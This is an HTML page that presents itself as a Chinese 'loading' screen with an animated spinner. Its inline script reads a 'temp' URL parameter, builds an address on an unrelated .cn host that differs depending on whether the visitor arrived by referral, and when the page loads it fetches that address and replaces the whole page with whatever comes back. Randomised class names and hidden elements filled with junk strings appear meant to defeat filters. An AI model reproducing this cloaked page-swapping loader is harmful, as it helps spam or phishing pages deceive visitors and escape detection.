<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .V7CfyLrDV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .V7CfyLrDV .KX6RWWDWox {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .V7CfyLrDV .content {
            line-height: 50px;
            text-align: center
        }

        .V7CfyLrDV .img {
            width: 100%
        }

        .V7CfyLrDV .zMRx0eLfr {
            text-align: center
        }

        .V7CfyLrDV .zMRx0eLfr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .V7CfyLrDV .zMRx0eLfr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .V7CfyLrDV .zMRx0eLfr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .V7CfyLrDV .zMRx0eLfr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .V7CfyLrDV .zMRx0eLfr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .V7CfyLrDV .zMRx0eLfr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .V7CfyLrDV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iKtcRdF1Rpn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ivwuTPc = iKtcRdF1Rpn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ivwuTPc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ivwuTPc +".html?a=share";
		}
		
        sHtPWhm=url+"#"+new Date().getTime();
        sHtPWhm && function() {
            $.get(sHtPWhm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ZiDw7X7anLf18dxOM4brf5jzfUCuFULCQ3lR8nVN5QK9114idHKYEeuVWCfiO38K8t8oQluZE</b>
<p  style='display:none'>oxJ3FJ2fz6SbkkvoMLzpawJg9ycylj0Y6hScaJhxWFgthHl</p>
<h1 style='display:none' >HC20JH6UWfWD2BuvHN5dG93lEdKgdBOZkhYjgeBpRuWr2WTfXEJkWlc9tUM</h1><div class="V7CfyLrDV">
    <div class="KX6RWWDWox">
        <div class="zMRx0eLfr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>gA9bu30An1zHN1J3astGRw1HDUhpFYxZs7FzNuNxw1RuSZCikmcZsHnckvCFPWe8yYOVRuvkKzVVr7N8yE</div>
<li style='display:none' >Upqw93dAG13G0xrcldOiavlwi2jtyNivCkB3nZDGM7JYW01uPNxnXstaShkrJ9BKBoIhU1s5AEh5mkpI8s</li>
<span style='display:none'>G1BtQ7kBQWoO5FXkHl8r2JN8Jh5FkUhtGqlEK67LE7j9YJscsT6Ef2Jr8dxfwVQlGrj</span>
<b style='display:none' >PMSwI4d6JXBhtfGD1KYtn0j5ExyQjmqpEzjI2n85WvVth0PhGlXL5v</b>
<h1 style='display:none' >aG6Q77JTfcmVyXYVUUIwk9dEn</h1>
<li style='display:none' >Upqw93dAG13G0xrcldOiavlwi2jtyNivCkB3nZDGM7JYW01uPNxnXstaShkrJ9BKBoIhU1s5AEh5mkpI8s</li>
<h1 style='display:none' >aG6Q77JTfcmVyXYVUUIwk9dEn</h1>
<li style='display:none' >Upqw93dAG13G0xrcldOiavlwi2jtyNivCkB3nZDGM7JYW01uPNxnXstaShkrJ9BKBoIhU1s5AEh5mkpI8s</li></body>
</html>